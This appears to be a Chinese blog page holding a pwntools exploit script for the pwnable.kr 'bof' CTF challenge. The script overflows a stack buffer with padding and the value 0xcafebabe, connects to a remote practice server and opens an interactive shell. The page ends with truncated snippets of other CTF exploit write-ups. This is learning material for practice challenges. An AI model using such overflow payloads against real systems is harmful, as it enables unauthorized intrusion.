【PWN】bof exploit.py

#Exploit for bof

from pwn import *

#init

context(arch = ‘i386‘, os = ‘linux‘)

local=False

if local:

p = process("./bof")

else:

p = remote("143.248.249.64", 9000)

#address

aim_value_str = ‘\xbe\xba\xfe\xca‘

len_of_stack = 0x34

#payload

payload = ‘a‘*len_of_stack

payload += aim_value_str

#let‘s send

p.send(payload + ‘\n‘)

#yeah!We got the shell!

p.interactive()

时间: 2024-10-13 04:41:28

【PWN】bof exploit.py的相关文章

【PWN】pwnable.kr echo1 writeup

#Exploit for [email protected] #@Windcarp 2015.07.23 from pwn import * #init context(arch = 'amd64', os = 'linux') local=False if local: p = process("./echo1") libc = ELF("/lib/x86_64-linux-gnu/libc-2.19.so") else: p = remote("pwn

【PWN】Pwnable.kr echo2 writeup

依旧是基本技巧的考察,shellcode的寻找着实费了一番周折,然后就是FSB和UAF漏洞的利用,很好的一题! #Exploit for [email protected] #@Windcarp 2015.07.23 from pwn import * #init context(arch = 'amd64', os = 'linux') local=False if local: p = process("./echo2") libc = ELF("/lib/x86_64-

【PWN】[email protected] exploit

利用典型的format string 漏洞实现内存泄露与内存覆写从而修改key实现直接通过,当然也可以覆写got表的内容改变程序执行流,这两个的缺点就是覆写的时候那个巨大的字符串确实需要很长时间才能输出完实现覆盖,看了国外的writeup里面提到了在内存中搜索key的地址,至少在时间上不会这么长,而且也是另一种截然不同的思路了.. 这一题确实学习到了不少,比如$n的使用,esp ebp的高级利用,对fsb有了一个更深的理解,顺便膜拜了一下CMU的PPP战队,为以后提供了不少经验吧-都在脚本里了-

【PWN】ISG2015 PWN 400 DICT WRITEUP

本题的利用思路是,因为REALLOC之后没有做检查,可以使ptr的值置为0,因此可以控制ptr之前的值,从而造成内存任意写的漏洞.利用是通过覆写got表,使用/bin/sh字符串作为realloc(system)的参数,从而拿到shell. 漏洞位置 任意写 利用 首先来看漏洞位置 ,因为ptr置0之后,可控参数有: v1 = (int)((char *)*(&ptr + 2 * v4) + 32 * (v5 + v2)); ptr是0,v5是wordcount,v2是从0开始遍历到新加的词数,

【PWN】[email protected] 日课

Code:int __cdecl main(int argc, const char **argv, const char **envp){ int result; // [email protected] char sloganstr; // [sp+1Ch] [bp-9Ch]@1 char namestr[16]; // [sp+9Ch] [bp-1Ch]@1 size_t nbytes; // [sp+ACh] [bp-Ch]@1 nbytes = 16; *(_DWORD *)names

【PWN】[email protected]

#Exploit for [email protected] #@Windcarp 2015.07.05 from pwn import * #init context(arch = 'i386', os = 'linux') local=True if local: p = process("./urldecoder") libc = ELF("/lib/i386-linux-gnu/libc.so.6") else: p = remote("166.1

【原创】python gettitle.py

#!/usr/bin/env python # coding=utf-8 import threading import requests import Queue import sys import re import time import warnings import datetime import argparse __author__ = 'depycode' warnings.filterwarnings("ignore") #ip to num def ip2num(i

【转】py文件编译为pyc

原文链接:http://blog.csdn.net/sislcb/article/details/4002414 说明: 我是一个python初学者,希望能够得到各位前辈的指导,大家一起交流.mail:sislcb at 126 dot com 什么是pyc文件 pyc是一种二进制文件,是由py文件经过编译后,生成的文件,是一种byte code,py文件变成pyc文件后,加载的速度有所提高,而且pyc是一种跨平台的字节码,是由python的虚拟机来执行的,这个是类似于JAVA或者.NET的虚拟

【Django】Django命令(Manager.py)

django-admin.py startproject mysite 该命令在当前目录创建一个 mysite 目录. django-admin.py这个文件在C:\Python27\Lib\site-packages\django\bin文件夹里,可以把该目录添加到系统Path里面. Django内置一个轻量级的Web服务器. 进入 mysite 目录的话,现在进入其中,并运行 python manage.py runserver 命令 启动服务器,用http://127.0.0.1:8000